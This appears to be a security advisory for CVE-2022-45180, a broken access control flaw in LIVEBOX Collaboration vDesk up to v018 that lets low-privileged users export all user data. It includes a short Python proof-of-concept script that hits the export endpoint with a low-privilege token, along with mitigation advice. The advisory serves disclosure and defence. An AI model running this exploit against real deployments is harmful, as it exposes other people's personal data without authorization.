Summary:
An issue has been discovered in LIVEBOX Collaboration vDesk up to v018 that allows a malicious user with low privileges to export information about all users in the system. This operation is supposed only to be available to the system administrator.

Vulnerability Details

Broken Access Control vulnerability was uncovered in LIVEBOX Collaboration vDesk. This vulnerability allows any authenticated user to the system, regardless of their privileges, to export information about all users via the API endpoint /api/v1/vdesk_{DOMAIN}/export. Ideally, this functionality should only be available to system administrators.

The affected systems are all LIVEBOX Collaboration vDesk software installed and operated up to version v018. If you have LIVEBOX Collaboration vDesk installed in your environment, you must ensure that you have applied the necessary updates to protect yourself from this vulnerability.

Exploit

The exploit can be performed by a user authenticated to the product without any specific privilege. By accessing the API endpoint /api/v1/vdesk_{DOMAIN}/export, an authenticated user can export all user information.

Here's the code snippet showcasing how the Broken Access Control vulnerability could be exploited

import requests

evil_user_token = "malicious_user_token"
DOMAIN = "example.com"
api_url = f"https://vdesk.{DOMAIN}/api/v1/vdesk_{DOMAIN}/export";

headers = {
    "Authorization": f"Bearer {evil_user_token}"
}

response = requests.post(api_url, headers=headers)

if response.status_code == 200:
    print("Successfully exported all user information!")
    exported_data = response.json()
else:
    print("Failed to exploit the vulnerability.")

Replace the evil_user_token variable above with a valid user token from a user with low privileges in the LIVEBOX Collaboration vDesk environment. This Python script will then send a request to the vulnerable API endpoint, and if successful, it will print out that the exploit was successful and store the exported data in the exported_data variable.

Mitigation

The developers of LIVEBOX Collaboration vDesk have released updates that address this vulnerability. If you are using a vulnerable version of the software, it's advised to update your LIVEBOX Collaboration vDesk immediately.

* Official LIVEBOX Collaboration vDesk Website
* LIVEBOX Collaboration vDesk Changelog

We cannot emphasize enough the importance of keeping your software up to date, especially products with sensitive information, such as LIVEBOX Collaboration vDesk. Regular checks for updates, patching, and reviewing access control policies will help protect your systems from vulnerabilities and exploitation.

Conclusion

CVE-2022-45180 is a critical security vulnerability that exposes user's information in systems running LIVEBOX Collaboration vDesk up to v018 by allowing authenticated users with low privileges to export all user data. Updating the software and ensuring proper access control policies in your environment is mandatory to safeguard your system from this vulnerability.

Timeline

Published on: 04/14/2023 14:15:00 UTC
Last modified on: 04/19/2023 19:28:00 UTC